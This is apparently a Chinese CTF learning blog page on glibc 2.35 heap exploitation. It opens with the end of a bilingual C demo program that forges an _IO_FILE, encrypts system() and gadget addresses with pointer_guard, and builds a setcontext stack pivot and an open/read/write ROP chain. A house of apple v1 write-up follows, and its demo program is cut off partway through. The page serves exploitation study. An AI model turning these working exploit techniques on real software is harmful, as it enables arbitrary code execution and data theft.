    puts("\033[32mThrough forging fake _IO_FILE struct, we can turn to anywhere that can be executed.\033[0m");
    puts("\033[32m通过伪造_IO_FILE结构体，我们可以执行任意地址的代码。\033[0m");
    puts("\033[32mThe easiest way in CTF is turning the execution flow into one gadget.\033[0m");
    puts("\033[32m在CTF比赛中最简单的方法就是将执行流转到one_gadget中。\033[0m");
    puts("\033[32mBut one gadgets in libc 2.35 all have many constraints, which we need to pay attention to.\033[0m");
    puts("\033[32m但glibc 2.35版本的one gadget有很多的限制条件需要注意。\033[0m");
    puts("\033[32mMoreover, many problems today have sandboxes, where you cannot use the syscall EXECVE.\033[0m");
    puts("\033[32m另外，现在的很多赛题都有沙箱，我们可能不能调用execve的系统调用。\033[0m");
    puts("\033[32mSo stack pivoting may be the most common step in exploitation.\033[0m");
    puts("\033[32m因此栈迁移就是本方法利用中较为常用的手段了。\n\033[0m");

    puts("\033[32mIn function __vxprintf_internal, which is called indirectly by __fxprintf, it will call function _IO_cookie_read: \033[0m");
    puts("\033[32m__fxprintf函数会间接调用到__vxprintf_internal函数，后者会调用_IO_cookie_read函数: \033[0m");
    puts("\033[34m<__vfprintf_internal+280>    call   qword ptr [r12 + 0x38]\033[0m");
    puts("\033[32mThe 'r12' here is (_IO_cookie_jumps + 0x38), which is the value of *vtable we wrote in before.\033[0m");
    puts("\033[32m这里的r12寄存器的值就是(_IO_cookie_jumps + 0x38), 这就是我们前面写的*vtable值。\033[0m");
    puts("\033[32mAs you can see in struct _IO_cookies_jump: \033[0m");
    puts("\033[32m就如_IO_cookies_jump中代码展示的这样: \033[0m");
    puts("\033[33m(line 111, /libio/iofopncook.c)\033[0m");
    puts("\033[34mstatic const struct _IO_jump_t _IO_cookie_jumps libio_vtable = {\n"
         "  JUMP_INIT_DUMMY,\n"
         "  JUMP_INIT(finish, _IO_file_finish),\n"
         "  JUMP_INIT(overflow, _IO_file_overflow),\n"
         "  JUMP_INIT(underflow, _IO_file_underflow),\n"
         "  JUMP_INIT(uflow, _IO_default_uflow),\n"
         "  JUMP_INIT(pbackfail, _IO_default_pbackfail),\n"
         "  JUMP_INIT(xsputn, _IO_file_xsputn),\n"
         "  JUMP_INIT(xsgetn, _IO_default_xsgetn),\n"
         "  JUMP_INIT(seekoff, _IO_cookie_seekoff),\n"
         "  JUMP_INIT(seekpos, _IO_default_seekpos),\n"
         "  JUMP_INIT(setbuf, _IO_file_setbuf),\n"
         "  JUMP_INIT(sync, _IO_file_sync),\n"
         "  JUMP_INIT(doallocate, _IO_file_doallocate),\n"
         "  JUMP_INIT(read, _IO_cookie_read),\n"
         "  JUMP_INIT(write, _IO_cookie_write),\n"
         "  JUMP_INIT(seek, _IO_cookie_seek),\n"
         "  JUMP_INIT(close, _IO_cookie_close),\n"
         "  JUMP_INIT(stat, _IO_default_stat),\n"
         "  JUMP_INIT(showmanyc, _IO_default_showmanyc),\n"
         "  JUMP_INIT(imbue, _IO_default_imbue),\n"
         "};\n\033[0m");
    puts("\033[31m(_IO_cookie_jumps + 0x38) \033[32mpoints to \033[35m_IO_file_xsputn\033[32m.\033[0m");
    puts("\033[31m(_IO_cookie_jumps + 0x38) \033[32m指向的是\033[35m_IO_file_xsputn\033[32m.\033[0m");
    puts("\033[31m(_IO_cookie_jumps + 0x38 + 0x38) \033[32mpoints to \033[35m_IO_cookie_read\033[32m.\033[0m");
    puts("\033[31m(_IO_cookie_jumps + 0x38 + 0x38) \033[32m指向的是\033[35m_IO_cookie_read\033[32m.\033[0m");
    puts("\033[32mSo here we let it call _IO_cookie_read function.\033[0m");
    puts("\033[32m所以这里我们让程序调用_IO_cookie_read函数.\n\033[0m");

    puts("\033[32mThen let's have a look at _IO_cookie_read function.\033[0m");
    puts("\033[32m让我们看一下_IO_cookie_read函数的内容。\033[0m");
    puts("\033[34m<_IO_cookie_read>:\tendbr64 \n"
         "   <_IO_cookie_read+4>:\tmov    rax,QWORD PTR [rdi+0xe8]\n"
         "   <_IO_cookie_read+11>:\tror    rax,0x11\n"
         "   <_IO_cookie_read+15>:\txor    rax,QWORD PTR fs:0x30\n"
         "   <_IO_cookie_read+24>:\ttest   rax,rax\n"
         "   <_IO_cookie_read+27>:\tje     <_IO_cookie_read+38>\n"
         "   <_IO_cookie_read+29>:\tmov    rdi,QWORD PTR [rdi+0xe0]\n"
         "   <_IO_cookie_read+36>:\t\033[31mjmp    rax\033[34m\n"
         "   <_IO_cookie_read+38>:\tmov    rax,0xffffffffffffffff\n"
         "   <_IO_cookie_read+45>:\tret\033[0m\n");
    puts("\033[32mAs you can see, it directly calls rax, and 'rdi' here is actually our fake _IO_FILE_plus address.\033[0m");
    puts("\033[32m可以看到，它直接call rax，这里的rdi实际上就是假的_IO_FILE_plus结构体的地址。\033[0m");
    puts("\033[32mSo that we can write any executable address into [rdi+0xe8].\033[0m");
    puts("\033[32m因此我们可以将任意可执行的地址写入到[rdi+0xe8].\033[0m");
    puts("\033[32mHowever, don't forget some instructions in the middle.\033[0m");
    puts("\033[32m但是，别忘了中间还有几条指令。\033[0m");
    puts("\033[32mHere, you can see a 'ror' instruction and a 'xor' instruction that change the value of rax.\033[0m");
    puts("\033[32m这里你可以看到有一个ror指令和一个xor指令，这些指令会修改rax的值。\033[0m");
    puts("\033[32mThat is actually a kind of protection strategy used in high versions of glibc ---- encrypting the address.\033[0m");
    puts("\033[32m这实际上是高版本glibc的一种保护方式——将地址进行简单加密。\033[0m");
    puts("\033[32mHere, these two instruction is decrypting rax, first ror 11 bits, and second xor fs:0x30h, which is our \033[31mpointer_guard.\033[0m");
    puts("\033[32m这里的这两条指令实际上是在解密rax，首先循环右移0x11位，然后异或fs:0x30h，这实际上就是\033[31mpointer_guard.\033[0m");
    puts("\033[32mNow you know that why we need the value of pointer_guard, it's important for us to encrypt executable address.\033[0m");
    puts("\033[32m现在你应该知道为什么我们需要修改pointer_guard的值了，它对于地址的加密过程很重要。\033[0m");
    puts("\033[32mThe encryption algorithm is easy to get: first xor pointer_guard, and second rol 0x11 bits.\033[0m");
    puts("\033[32m加密方式很好推出来：首先异或pointer_guard，然后循环左移0x11位。\n\033[0m");

    puts("\033[32mPay attention to the instruction before 'jmp rax': mov rdi, QWORD PTR [rdi+0xe0]\033[0m");
    puts("\033[32m注意'jmp rax'之前的指令: mov rdi, QWORD PTR [rdi+0xe0]\n\033[0m");
    puts("\033[32mIf there is not any sandbox, we can let rax=system() address, and [rdi+0xe0]='/bin/sh' address.\033[0m");
    puts("\033[32m如果这里没有沙箱，我们可以让rax等于system函数地址，[rdi+0xe0]等于字符串/bin/sh的地址\033[0m");
    puts("\033[32mElse, you can also fill it with 'pcop' to trigger stack pivoting and open, read, write flag file.\033[0m");
    puts("\033[32m否则，我们也可以填充pcop的地址来触发栈迁移，然后打开、读、写flag文件。\n\033[0m");

    if(mode == 1){
        puts("\033[35mYou chose the getshell mode.\033[0m");
        puts("\033[35m你选择了getshell模式。\033[0m");
        puts("\033[32mSo that we'll write '/bin/sh' address into [rdi+0xe0] and encrypted system() address into [rdi+0xe8]\033[0m");
        puts("\033[32m所以我们在[rdi+0xe0]处写入字符串/bin/sh的地址，将加密后的system函数地址写入[rdi+0xe8]处。\033[0m");

        char** sh_addr = (char**)((char*)fake_file_struct + 0xe0);
        printf("\033[32mThe address of string '/bin/sh' should be written in: \033[31m%p\n\033[0m", sh_addr);
        printf("\033[32m字符串'/bin/sh'的地址应该被写到: \033[31m%p\n\033[0m", sh_addr);
        *sh_addr = sh;
        printf("\033[32m指针解引用的值为: \033[31m%p\033[0m\n", *sh_addr);

        size_t* system_addr = (size_t*)((char*)fake_file_struct + 0xe8);
        printf("\033[32mThe address of function system() should be written in: \033[31m%p\n\033[0m", system_addr);
        printf("\033[32m函数system()的地址应该被写到: \033[31m%p\n\033[0m", system_addr);
        *system_addr = (size_t)system;
        printf("\033[32mNow the value of the pointer is: \033[31m%#zx\033[0m\n", *system_addr);
        printf("\033[32m指针解引用的值为: \033[31m%#zx\033[0m\n", *system_addr);
        printf("\033[32mThen we need to let it xor with pointer_guard: \033[33m%#zx.\n\033[0m", *pointer_guard_address);
        printf("\033[32m然后我们需要让这个值异或pointer_guard: \033[33m%#zx.\n\033[0m", *pointer_guard_address);
        *system_addr ^= *pointer_guard_address;
        printf("\033[32mAfter xor, the value of [rdi+0xe8] is: \033[35m%#zx\n\033[0m", *system_addr);
        printf("\033[32m异或之后[rdi+0xe8]的值为: \033[35m%#zx\n\033[0m", *system_addr);
        puts("\033[32mThen we need to let it rol 0x11 bits.\n\033[0m");
        puts("\033[32m然后我们循环左移0x11位:\n\033[0m");
        *system_addr = (*system_addr << 0x11) + (*system_addr >> 0x2f);
        printf("\033[32mAfter rol, the value of [rdi+0xe8] is: \033[35m%#zx\n\033[0m\n", *system_addr);
        printf("\033[32m循环左移后，[rdi+0xe8]的值为: \033[35m%#zx\n\033[0m\n", *system_addr);
    }else if(mode == 2){
        puts("\033[32mYou chose the orw mode.\033[0m");
        puts("\033[32m你选择了orw模式。\033[0m");
        puts("\033[1;31mIMPORTANT: You must make sure that there is a flag file in this directory, or we'll be unable to read.\033[0m");
        puts("\033[1;31m注意：你必须保证当前文件夹下有一个flag文件，否则该程序将无法读取。\n\033[0m");

        puts("\033[32mIn glibc 2.35, we usually use setcontext() function to trigger stack pivoting, but with a little difference from lower versions.\033[0m");
        puts("\033[32m在glibc 2.35中，我们一般使用setcontext函数进行栈迁移，但与低版本的glibc的利用方式有一些小差别。\033[0m");
        puts("\033[32mIn lower version, the instruction that changes the rsp is: 'mov rsp, [rdi+xx]'.\033[0m");
        puts("\033[32m在低版本glibc中，修改rsp的指令为: 'mov rsp, [rdi+xx]'.\033[0m");
        puts("\033[32mThe rdi here is our [fake _IO_FILE_plus struct + 0xe0].\033[0m");
        puts("\033[32m这里的rdi是[fake _IO_FILE_plus struct + 0xe0].\033[0m");
        puts("\033[32mBut in glibc 2.35, the instruction was changed to: \033[31m'mov rsp, [rdx+xx]'\033[32m.\033[0m");
        puts("\033[32m但是在glibc 2.35中，这条指令被修改为: \033[31m'mov rsp, [rdx+xx]'\033[32m.\033[0m");
        puts("\033[32mSo that we can't change the value of rsp only by writing forged data in our fake _IO_FILE_plus struct.\033[0m");
        puts("\033[32m所以我们不能仅通过将假的数据写入到假的_IO_FILE_plus结构体而修改rsp的值。\033[0m");
        puts("\033[32mHowever, we still have our way to exploit. It's called pcop, which is just a unique gadget.");
        puts("\033[32m但我们依然能够进行漏洞利用，需要一个pcop，这是一个特殊的gadget。\n");

        puts("\033[32mTry to use this command below in the terminal: \033[0m");
        puts("\033[32m可以尝试在终端运行以下命令：: \033[0m");
        puts("\033[1;34mobjdump -d /lib/x86_64-linux-gnu/libc.so.6 -M intel | grep '1675b'\033[0m");
        puts("\033[32mYou can see a gadget in offset \033[31m0x1675b0\033[32m: \033[0m\n");
        puts("\033[32m你可以在偏移\033[31m0x1675b0\033[32m处看到有一个gadget: \033[0m\n");
        puts("\033[34m  1675b0:       48 8b 57 08             mov    rdx,QWORD PTR [rdi+0x8]\n"
             "  1675b4:       48 89 04 24             mov    QWORD PTR [rsp],rax\n"
             "  1675b8:       ff 52 20                call   QWORD PTR [rdx+0x20]\033[0m\n");
        puts("\033[32mIt seems that we can use the value of [rdi+0x8] to change rdx to any value as we like.\033[0m");
        puts("\033[32m我们似乎可以使用[rdi+0x8]的值去修改rdx的值为任意值。\033[0m");
        puts("\033[32mAnd then we can change the rip into [rdx+0x20].\033[0m");
        puts("\033[32m然后我们就可以将rip修改到[rdx+0x20]。\033[0m");
        puts("\033[32mWe can change rdx to a place that we can control, then write setcontext() address in it to trigger stack pivoting.\033[0m");
        puts("\033[32m我们可以将rdx修改到一个我们可以控制的地方，然后将setcontext函数的地址写进去来触发栈迁移。\033[0m");
        puts("\033[32mTo keep the environment of heap, we use a space in bss segment to complete this process.\033[0m");
        puts("\033[32m为了保持堆环境，我们使用bss段的一块空间来完成这个过程。\033[0m");
        printf("\033[32mThe address of bss space is: \033[31m%p\033[32m.\033[0m\n", &space);
        printf("\033[32mbss对应地址为: \033[31m%p\033[32m.\033[0m\n\n", &space);

        puts("\033[32mWe let [rdi+0xe0] = bss address, [rdi+0xe8] = pcop address.\033[0m");
        puts("\033[32m我们让[rdi+0xe0] = bss的地址, [rdi+0xe8] = pcop的地址.\033[0m");
        size_t* bss_address = (size_t*)((char*)fake_file_struct + 0xe0);
        printf("\033[32mThe address of bss should be written in: \033[31m%p\n\033[0m", bss_address);
        printf("\033[32m这个bss的地址应该被写入: \033[31m%p\n\033[0m", bss_address);
        *bss_address = (size_t)(&space);
        printf("\033[32mThe value of the pointer is: \033[31m%#zx\033[0m\n", *bss_address);
        printf("\033[32m这个指针的值现在为: \033[31m%#zx\033[0m\n", *bss_address);

        size_t* pcop = (size_t*)((char*)fake_file_struct + 0xe8);
        printf("\033[32mThe address of pcop should be written in: \033[31m%p\n\033[0m", pcop);
        printf("\033[32mpcop的地址应该被写入到: \033[31m%p\n\033[0m", pcop);
        *pcop = (size_t)(libc_base + 0x1675b0);
        printf("\033[32mThe value of the pointer is: \033[31m%#zx\033[0m\n", *pcop);
        printf("\033[32m这个指针现在的值为: \033[31m%#zx\033[0m\n", *pcop);
        puts("\033[32mDon't forget we need to encrypt the pcop value.\033[0m");
        puts("\033[32m别忘了我们需要加密pcop的值。\033[0m");

        printf("\033[32mThen we need to let it xor with pointer_guard: \033[33m%#zx.\n\033[0m", *pointer_guard_address);
        printf("\033[32m然后我们需要让pcop与pointer_guard异或: \033[33m%#zx.\n\033[0m", *pointer_guard_address);
        *pcop ^= *pointer_guard_address;
        printf("\033[32mAfter xor, the value of [rdi+0xe8] is: \033[35m%#zx\n\033[0m", *pcop);
        printf("\033[32m异或之后，[rdi+0xe8]的值为: \033[35m%#zx\n\033[0m", *pcop);

        puts("\033[32mThen we need to let it rol 0x11 bits.\033[0m");
        puts("\033[32m然后我们让它循环左移0x11位。\033[0m");
        *pcop = (*pcop << 0x11) + (*pcop >> 0x2f);
        printf("\033[32mAfter rol, the value of [rdi+0xe8] is: \033[35m%#zx\n\033[0m\n", *pcop);
        printf("\033[32m循环左移之后，[rdi+0xe8]的值为: \033[35m%#zx\n\033[0m\n", *pcop);

        puts("\033[32mNow, we are ready to write something in our bss segment.\033[0m");
        puts("\033[32m现在我们准备写一些内容到bss段。\033[0m");
        puts("\033[32mNoticing that the first instruction of pcop moves [rdi+0x8] to rdx, while rdi now is address of bss.\033[0m");
        puts("\033[32m注意到pcop的第一条指令将[rdi+0x8]的值移动到rdx，而rdi此时的值是bss处的地址。\033[0m");
        printf("\033[32mSo that we can write the address of somewhere in bss to [rdi+0x8](%p).\033[0m", &(space[1]));
        printf("\033[32m所以我们可以将任意地址写到[rdi+0x8](%p)这个bss段中的地址。.\033[0m", &(space[1]));
        space[1] = (size_t)space;
        printf("\033[32m[rdi+0x8] now is: \033[31m%#zx\033[32m.\n\033[0m", space[1]);
        printf("\033[32m[rdi+0x8]现在的值为: \033[31m%#zx\033[32m.\n\033[0m", space[1]);

        puts("\033[32mThen we need to write address of setcontext into [rdx+0x20].\033[0m");
        puts("\033[32m然后我们需要写setcontext函数的地址到[rdx+0x20]。\033[0m");
        puts("\033[32mHave a look at disassembly result of function setcontext: \033[0m");
        puts("\033[32m看一下setcontext函数的汇编: \033[0m");
        puts("\033[34m.text:0000000000053A6D                 \033[1;31mmov     rsp, [rdx+0A0h]\033[34m\n"
             ".text:0000000000053A74                 mov     rbx, [rdx+80h]\n"
             ".text:0000000000053A7B                 mov     rbp, [rdx+78h]\n"
             ".text:0000000000053A7F                 mov     r12, [rdx+48h]\n"
             ".text:0000000000053A83                 mov     r13, [rdx+50h]\n"
             ".text:0000000000053A87                 mov     r14, [rdx+58h]\n"
             ".text:0000000000053A8B                 mov     r15, [rdx+60h]\n"
             ".text:0000000000053A8F                 test    dword ptr fs:48h, 2\n"
             ".text:0000000000053A9B                 jz      loc_53B56\n"
             "\t\t\t......\n"
             ".text:0000000000053B56                 \033[1;31mmov     rcx, [rdx+0A8h]\033[34m\n"
             ".text:0000000000053B5D                 \033[1;31mpush    rcx\033[34m\n"
             ".text:0000000000053B5E                 mov     rsi, [rdx+70h]\n"
             ".text:0000000000053B62                 mov     rdi, [rdx+68h]\n"
             ".text:0000000000053B66                 mov     rcx, [rdx+98h]\n"
             ".text:0000000000053B6D                 mov     r8, [rdx+28h]\n"
             ".text:0000000000053B71                 mov     r9, [rdx+30h]\n"
             ".text:0000000000053B75                 mov     rdx, [rdx+88h]\n"
             ".text:0000000000053B75 ; } // starts at 53A30\n"
             ".text:0000000000053B7C ; __unwind {\n"
             ".text:0000000000053B7C                 xor     eax, eax\n"
             ".text:0000000000053B7E                 retn\033[0m");

        puts("\033[32mWe let [rdx+0xa0] = bss + 0x100, and let [rdx+0xa8] = some gadget address as the start of our ROP chain.\033[0m");
        puts("\033[32m我们让[rdx+0xa0] = bss + 0x100, 让[rdx+0xa8] = 某些gadget的地址作为ROP链的开始。\033[0m");
        puts("\033[32mThere are some useful gadgets: \033[0m");
        puts("\033[32m这里是一些有用的gadget地址: \033[0m");
        size_t poprdi_ret = libc_base + 0x2a3e5;
        size_t poprsi_ret = libc_base + 0x2be51;
        size_t poprdx_rbx_ret = libc_base + 0x90529;
        printf("\033[33mpop rdi ; ret : %#zx\n\033[0m", poprdi_ret);
        printf("\033[33mpop rsi ; ret : %#zx\n\033[0m", poprsi_ret);
        printf("\033[33mpop rdx ; pop rbx ; ret : %#zx\n\033[0m", poprdx_rbx_ret);
        puts("\033[32mHere are some key functions: \033[0m");
        puts("\033[32m这里是一些关键函数的地址: \033[0m");
        size_t readfunc_addr = (size_t)read;
        size_t writefunc_addr = (size_t)write;
        size_t openfunc_addr = (size_t)open;
        printf("\033[33mopen(): %#zx\n\033[0m", openfunc_addr);
        printf("\033[33mread(): %#zx\n\033[0m", readfunc_addr);
        printf("\033[33mwrite(): %#zx\n\033[0m", writefunc_addr);

        space[0x20 / 8] = (size_t)(libc_base + 0x53a6d);
        space[0xa0 / 8] = (size_t)(&space[0x100 / 8]);
        space[0xa8 / 8] = poprdi_ret;

        puts("\033[32mThen let's construct our ROP chain.\033[0m");
        puts("\033[32m然后我们来构造ROP链。\033[0m");
        space[0x100 / 8] = (size_t)flag;
        space[0x108 / 8] = poprsi_ret;
        space[0x110 / 8] = 0;
        space[0x118 / 8] = openfunc_addr;
        space[0x120 / 8] = poprdi_ret;
        space[0x128 / 8] = 3;
        space[0x130 / 8] = poprsi_ret;
        space[0x138 / 8] = (size_t)(&space[0xf0]);
        space[0x140 / 8] = poprdx_rbx_ret;
        space[0x148 / 8] = 0x40;
        space[0x150 / 8] = 0;
        space[0x158 / 8] = readfunc_addr;
        space[0x160 / 8] = poprdi_ret;
        space[0x168 / 8] = 1;
        space[0x170 / 8] = poprsi_ret;
        space[0x178 / 8] = (size_t)(&space[0xf0]);
        space[0x180 / 8] = poprdx_rbx_ret;
        space[0x188 / 8] = 0x40;
        space[0x190 / 8] = 0;
        space[0x198 / 8] = writefunc_addr;

        puts("\033[32mHere is the former part of bss spare space:\033[0m");
        puts("\033[32m下面是bss空闲区域前面的一部分:\033[0m");
        for(int i=0; i<0x20; i++)
            printf("\033[1;34m+%#5x\t\t%#18zx\t\t%#18zx\n\033[0m", i * 0x10, space[2*i], space[2*i+1]);

    }else{
        puts("\033[31mError: invalid exploit mode!\033[0m");
        puts("\033[31m错误：选择了无效的利用模式！\033[0m");
        exit(1);
    }

    puts("\033[032mThen, we need to \033[31mchange the size of top chunk to make it unaligned, and malloc a big space.\033[0m");
    puts("\033[032m然后，我们需要\033[31m修改top chunk的大小来让它不对齐，然后malloc一块大空间。\033[0m");
    *top_chunk_size = 0x101;
    printf("\033[32mThe value of top_chunk->size was changed into: %#zx\033[0m\n", *top_chunk_size);
    printf("\033[32m现在top_chunk->size的值被修改为: %#zx\033[0m\n", *top_chunk_size);

    puts("\033[32mThen, change the value of stderr pointer.\033[0m");
    puts("\033[32m然后，修改stderr指针的值。\033[0m");
    printf("\033[32mBefore alteration: *stderr_pointer = \033[33m%p\n\033[0m", *((struct _IO_FILE**)(stderr_ptr)));
    printf("\033[32m修改之前: *stderr_pointer = \033[33m%p\n\033[0m", *((struct _IO_FILE**)(stderr_ptr)));
    *(size_t*)stderr_ptr = (size_t)fake_file_struct;
    printf("\033[32mAfter alteration: *stderr_pointer = \033[31m%p\n\033[0m", *((struct _IO_FILE**)(stderr_ptr)));
    printf("\033[32m修改之后: *stderr_pointer = \033[31m%p\n\033[0m", *((struct _IO_FILE**)(stderr_ptr)));

    printf("\033[32mAnd the last step: malloc(0x200) to trigger sysmalloc.\n\033[0m");
    printf("\033[32m然后是最后一步：malloc(0x200)触发sysmalloc。\n\033[0m");
    malloc(0x200);
}

glibc 2.35 pwn——house of apple v1 示例程序

发表于 2023-02-28 更新于 2023-03-01 分类于学习笔记， glibc 系列
本文字数： 20k 阅读时长 ≈ 18 分钟

house of apple这种利用方式针对于新版的glibc，在这个资料中有详细的分析与说明。这里根据该资料进行简单总结，并编写示例程序便于理解。

在house of pig中，我们需要使用两次large bin attack攻击作为前菜，第一次需要修改_IO_list_all指针的值，第二次需要修改__free_hook附近空间的值。而与之形成对比的是，house of apple只需要1次large bin attack即可完成攻击。这里需要注意：house of apple并不是一个可以直接getshell的攻击方式，它更像是一种攻击思路，一种只使用一次large bin attack进行FSOP的思路，在house of apple之后可以接上多种多样的攻击方式来达到我们最终的目的。考虑到与FILE结构体有关的函数有很多都是可以利用的，因此在具体的情境下，攻击的流程一般较为灵活。

使用house of apple的条件为：
1、程序从main函数返回或能调用exit函数
2、能泄露出heap地址和libc地址
3、能使用一次largebin attack（一次即可）

house of apple v1通过exit函数触发，exit调用到_IO_flush_all_lockp，后者遍历_IO_list_all中的FILE结构体并依次执行跳表中的overflow函数。在本利用方式中，使用伪造的FILE结构体，vtable填写_IO_wstrn_jumps，这样可以执行到_IO_wstrn_overflow函数，而_IO_wstrn_overflow会进行一系列赋值操作，将假FILE结构体的_wide_data字段保存的地址附近写入多个值。

具体的利用方式详见下面的示例程序，在开头提到的资料中还有针对house of apple攻击后的一系列可能的后续操作。

//
// Created by root on 23-1-10.
//
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <sys/mman.h>

#define BLACK       "30"
#define RED         "31"
#define GREEN       "32"
#define YELLOW      "33"
#define BLUE        "34"
#define PURPLE      "35"
#define GREEN_DARK  "36"
#define WHITE       "37"

#define UNDEFINED   "-"
#define HIGHLIGHT   "1"
#define UNDERLINE   "4"
#define SPARK       "5"

#define STR_END      "\033[0m"

size_t victim[0x20];

void printf_color(char* color, char* effect, char* string){
    char buffer[0x1000] = {0};
    strcpy(buffer, "\033[");
    if(effect[0] != '-'){
        strcat(buffer, effect);
        strcat(buffer, ";");
    }
    strcat(buffer, color);
    strcat(buffer, "m");
    strcat(buffer, string);
    printf("%s" STR_END, buffer);
}

void print_binary(char* buf, int length){
    printf("---------------------------------------------------------------------------\n");
    printf("Address info starting in %p:\n", buf);
    int index = 0;
    char output_buffer[80];
    memset(output_buffer, '\0', 80);
    memset(output_buffer, ' ', 0x10);
    for(int i=0; i<(length % 16 == 0 ? length / 16 : length / 16 + 1); i++){
        char temp_buffer[0x10];
        memset(temp_buffer, '\0', 0x10);
        sprintf(temp_buffer, "%#5x", index);
        strcpy(output_buffer, temp_buffer);
        output_buffer[5] = ' ';
        output_buffer[6] = '|';
        output_buffer[7] = ' ';
        for(int j=0; j<16; j++){
            if(index+j >= length)
                sprintf(output_buffer+8+3*j, "   ");
            else{
                sprintf(output_buffer+8+3*j, "%02x ", ((int)buf[index+j]) & 0xFF);
                if(!isprint(buf[index+j]))
                    output_buffer[58+j] = '.';
                else
                    output_buffer[58+j] = buf[index+j];
            }
        }
        output_buffer[55] = ' ';
        output_buffer[56] = '|';
        output_buffer[57] = ' ';
        printf("%s\n", output_buffer);
        memset(output_buffer+58, '\0', 16);
        index += 16;
    }
    printf("---------------------------------------------------------------------------\n");
}

void print_victim(){
    printf_color(YELLOW, HIGHLIGHT, "修改后：\n");
    print_binary((char*)victim, 0x80);
}

int main(){
    printf_color(GREEN, UNDEFINED, "本程序用于演示house of apple v1利用方式。\n");
    printf_color(YELLOW, HIGHLIGHT, "测试于ubuntu 22.04，glibc版本：Ubuntu GLIBC 2.35-0ubuntu3.1。\n");
    printf_color(GREEN, UNDEFINED, "house of apple并不是一个能直接getshell的攻击方式，它的功能是在任意地址写堆地址。\n");
    printf_color(GREEN, UNDEFINED, "在很多赛题中，house of apple只是一个引子，"
                                                        "在第一个FILE后面接其他的FILE结构体可以实现多种方式的利用。\n");
    printf_color(GREEN, UNDEFINED, "本演示程序就是利用第二个伪造的FILE结构体打印house of apple的攻击效果。\n");
    printf_color(GREEN, UNDEFINED, "在house of apple v1中，利用的核心思想是FILE结构体中的_wide_data字段。\n");
    printf_color(GREEN, UNDEFINED, "再一次重温FILE结构体的内容：\n\n");

    printf_color(BLUE, HIGHLIGHT, "(/libio/libioP.h, line 334)\n");
    printf_color(PURPLE, HIGHLIGHT,
                 "struct _IO_FILE_complete_plus\n"
                 "{\n"
                 "  struct _IO_FILE_complete file;\n"
                 "  const struct _IO_jump_t *vtable;\n"
                 "};\n\n");

    printf_color(BLUE, HIGHLIGHT, "(/libio/libioP.h, line 324)\n");
    printf_color(PURPLE, HIGHLIGHT,
                 "struct _IO_FILE_plus\n"
                 "{\n"
                 "  FILE file;\n"
                 "  const struct _IO_jump_t *vtable;\n"
                 "};\n\n");

    printf_color(BLUE, HIGHLIGHT, "(/libio/bits/types/struct_FILE.h, line 85)\n");
    printf_color(PURPLE, HIGHLIGHT,
                 "struct _IO_FILE_complete\n"
                 "{\n"
                 "  struct _IO_FILE _file;\n"
                 "#endif\n"
                 "  __off64_t _offset;\n"
                 "  /* Wide character stream stuff.  */\n"
                 "  struct _IO_codecvt *_codecvt;\n"
                 "  struct _IO_wide_data *_wide_data;\n"
                 "  struct _IO_FILE *_freeres_list;\n"
                 "  void *_freeres_buf;\n"
                 "  size_t __pad5;\n"
                 "  int _mode;\n"
                 "  /* Make sure we don't get into trouble again.  */\n"
                 "  char _unused2[15 * sizeof (int) - 4 * sizeof (void *) - sizeof (size_t)];\n"
                 "};\n\n");

    printf_color(BLUE, HIGHLIGHT, "(/libio/bits/types/struct_FILE.h, line 49)\n");
    printf_color(PURPLE, HIGHLIGHT,
                 "struct _IO_FILE\n"
                 "{\n"
                 "  int _flags;\t\t/* High-order word is _IO_MAGIC; rest is flags. */\n"
                 "\n"
                 "  /* The following pointers correspond to the C++ streambuf protocol. */\n"
                 "  char *_IO_read_ptr;\t/* Current read pointer */\n"
                 "  char *_IO_read_end;\t/* End of get area. */\n"
                 "  char *_IO_read_base;\t/* Start of putback+get area. */\n"
                 "  char *_IO_write_base;\t/* Start of put area. */\n"
                 "  char *_IO_write_ptr;\t/* Current put pointer. */\n"
                 "  char *_IO_write_end;\t/* End of put area. */\n"
                 "  char *_IO_buf_base;\t/* Start of reserve area. */\n"
                 "  char *_IO_buf_end;\t/* End of reserve area. */\n"
                 "\n"
                 "  /* The following fields are used to support backing up and undo. */\n"
                 "  char *_IO_save_base; /* Pointer to start of non-current get area. */\n"
                 "  char *_IO_backup_base;  /* Pointer to first valid character of backup area */\n"
                 "  char *_IO_save_end; /* Pointer to end of non-current get area. */\n"
                 "\n"
                 "  struct _IO_marker *_markers;\n"
                 "\n"
                 "  struct _IO_FILE *_chain;\n"
                 "\n"
                 "  int _fileno;\n"
                 "  int _flags2;\n"
                 "  __off_t _old_offset; /* This used to be _offset but it's too small.  */\n"
                 "\n"
                 "  /* 1+column number of pbase(); 0 is unknown. */\n"
                 "  unsigned short _cur_column;\n"
                 "  signed char _vtable_offset;\n"
                 "  char _shortbuf[1];\n"
                 "\n"
                 "  _IO_lock_t *_lock;\n"
                 "#ifdef _IO_USE_OLD_IO_FILE\n"
                 "};\n\n");

    printf_color(GREEN, UNDEFINED, "我们需要使用伪造的_IO_FILE_complete_plus结构体，并将这个伪造结构体的地址写到_IO_list_all。\n");
    printf_color(GREEN, UNDEFINED, "在调用exit函数后，结构体需要执行_IO_wstrn_overflow函数，这需要vtable填入_IO_wstrn_jumps的地址。\n\n");

    printf_color(BLUE, HIGHLIGHT, "(/libio/vswprintf.c, line 33)\n");
    printf_color(PURPLE, HIGHLIGHT,
                 "static wint_t\n"
                 "_IO_wstrn_overflow (FILE *fp, wint_t c)\n"
                 "{\n"
                 "  /* When we come to here this means the user supplied buffer is\n"
                 "     filled.  But since we must return the number of characters which\n"
                 "     would have been written in total we must provide a buffer for\n"
                 "     further use.  We can do this by writing on and on in the overflow\n"
                 "     buffer in the _IO_wstrnfile structure.  */\n"
                 "  _IO_wstrnfile *snf = (_IO_wstrnfile *) fp;\n"
                 "\n"
                 "\033[1;31m  if (fp->_wide_data->_IO_buf_base != snf->overflow_buf)\n"
                 "    {\n"
                 "      _IO_wsetb (fp, snf->overflow_buf,\n"
                 "\t\t snf->overflow_buf + (sizeof (snf->overflow_buf)\n"
                 "\t\t\t\t      / sizeof (wchar_t)), 0);\n"
                 "\n"
                 "      fp->_wide_data->_IO_write_base = snf->overflow_buf;\n"
                 "      fp->_wide_data->_IO_read_base = snf->overflow_buf;\n"
                 "      fp->_wide_data->_IO_read_ptr = snf->overflow_buf;\n"
                 "      fp->_wide_data->_IO_read_end = (snf->overflow_buf\n"
                 "\t\t\t\t      + (sizeof (snf->overflow_buf)\n"
                 "\t\t\t\t\t / sizeof (wchar_t)));\n"
                 "    }\n"
                 "\n"
                 "  fp->_wide_data->_IO_write_ptr = snf->overflow_buf;\n"
